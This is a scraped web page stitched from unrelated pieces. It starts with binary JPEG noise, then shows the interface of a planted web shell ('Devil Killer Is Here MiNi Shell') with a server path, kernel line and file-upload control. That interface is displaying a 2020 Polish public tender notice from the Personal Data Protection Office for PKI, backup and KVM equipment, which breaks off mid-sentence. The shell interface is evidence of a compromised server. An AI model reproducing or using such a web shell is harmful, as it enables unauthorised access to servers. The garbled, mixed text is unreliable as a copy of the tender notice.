JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20201110/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20201110/608562-N-2020.html

 <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 608562-N-2020 z dnia 2020-11-10 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Urząd Ochrony Danych Osobowych</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Zakup i wdrożenie mechanizmów Infrastruktury klucza publicznego, systemu kopii zapasowych, konsoli i przełącznika KVM </span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej – mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Urząd Ochrony Danych Osobowych</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">13049097000000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Stawki</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">2</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">00-193</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Warszawa</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">mazowieckie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">22 531 03 00, </span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">przetargi@uodo.gov.pl, , </span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">22 531 03 01</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.uodo.gov.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja rządowa centralna</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.uodo.gov.pl/pl/zamowienia-publiczne</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Nie</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Ofertę w prowadzonym postępowaniu należy złożyć w formie pisemnej w rozumieniu art. 78 § 1 Kodeksu Cywilnego (t.j. Dz. U. z 2019 r., poz. 1145 z późn. zm.), za pośrednictwem operatora pocztowego, posłańca lub osobiście.</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Ofertę należy złożyć w siedzibie Zamawiającego, mieszczącej się w Warszawie przy ul. Stawki 2,w Kancelarii Głównej Urzędu Ochrony Danych Osobowych w pokoju nr 1117.</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Zakup i wdrożenie mechanizmów Infrastruktury klucza publicznego, systemu kopii zapasowych, konsoli i przełącznika KVM </span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">DA.201.8.2020</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Przedmiotem zamówienia jest zakup i wdrożenie mechanizmów Infrastruktury klucza publicznego, systemu kopii zapasowych, konsoli i KVM. Przedmiot zamówienia został podzielony na 3 części:Część I – Zakup i wdrożenie mechanizmów infrastruktury klucza publicznego;	Część II – Zakup i wdrożenie systemu kopii zapasowych;Część III – Zakup i dostawa konsoli (klawiatura, monitor, mysz) i przełącznika KVMOpis przedmiotu zamówienia, zwany dalej OPZ zawarty jest dla każdej części w Załącznikach nr 1A, 1B, 1C do SIWZ. </span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">48730000-4</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30200000-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30231200-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30230000-0</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów – szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach">21</span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">dla Części I – Zakup i wdrożenie mechanizmów infrastruktury klucza publicznego;Wykonawca spełni warunek jeżeli wykaże, że posiada polisę lub inny dokument potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę min. 145 000,00 zł brutto;dla Części II – Zakup i wdrożenie systemu kopii zapasowych;Wykonawca spełni warunek jeżeli wykaże, że posiada polisę lub inny dokument potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę min. 80 000,00 zł brutto;dla Części III – Zakup i dostawa konsoli (klawiatura, monitor, mysz ) i przełącznika KVM;Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">dla Części I – Zakup i wdrożenie mechanizmów infrastruktury klucza publicznego;Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku.dla Części II – Zakup i wdrożenie systemu kopii zapasowych; Wykonawca spełni warunek, jeżeli wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wykonał lub wykonuje należycie co najmniej 3 wdrożenia o analogicznym charakterze i zakresie do przedmiotu zamówienia każde o wartości brutto nie mniejszej niż – 30 000,00 zł, wraz z podaniem daty, miejsca wykonania i podmiotów, na rzecz których dostawa została wykonana, z załączeniem dowodów określających czy ta dostawa została wykonana należycie. W przypadku dostawy w trakcie trwania, Wykonawca musi wykazać, że zrealizował już dostawę w wymienionym zakresie i na kwotę nie niższą niż wymagana przez Zamawiającego;dla Części III – Zakup i dostawa konsoli (klawiatura, monitor, mysz) i przełącznika KVM;Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na postawie art. 24 ust. 5 pkt 1 ustawy Pzp. Wykonawca nie jest obowiązany do złożenia ww. dokumentów jeżeli wskaże Zamawiającemu adres internetowy gdzie może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (t.j. Dz. U. z 2020 r. poz. 364 z późn. zm.)</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">Wykaz dostaw wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów, określających że co najmniej jedna dostawa została wykonana lub jest wykonywana należycie o wartości brutto minimum: 30 000,00 zł brutto dla Części II; wg wzoru stanowiącego Załącznik nr 6 do SIWZdla Części I – Zakup i wdrożenie mechanizmów infrastruktury klucza publicznego;Wykonawca spełni warunek jeżeli wykaże, że posiada polisę lub inny dokument potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę min. 145 000,00 zł brutto;dla Części II – Zakup i wdrożenie systemu kopii zapasowych;Wykonawca spełni warunek jeżeli wykaże, że posiada polisę lub inny dokument potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę min. 80 000,00 zł brutto;dla Części III – Zakup i dostawa konsoli (klawiatura, monitor, mysz ) i przełącznika KVM;Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku.Oświadczenie Wykonawcy:a) o warunkach gwarancji, Wykonawca będzie pośredniczył w zakresie realizacji gwarancji producenta sprzętu,b) potwierdzające, że dostarczone urządzenia i oprogramowanie jest legalne, pochodzi z 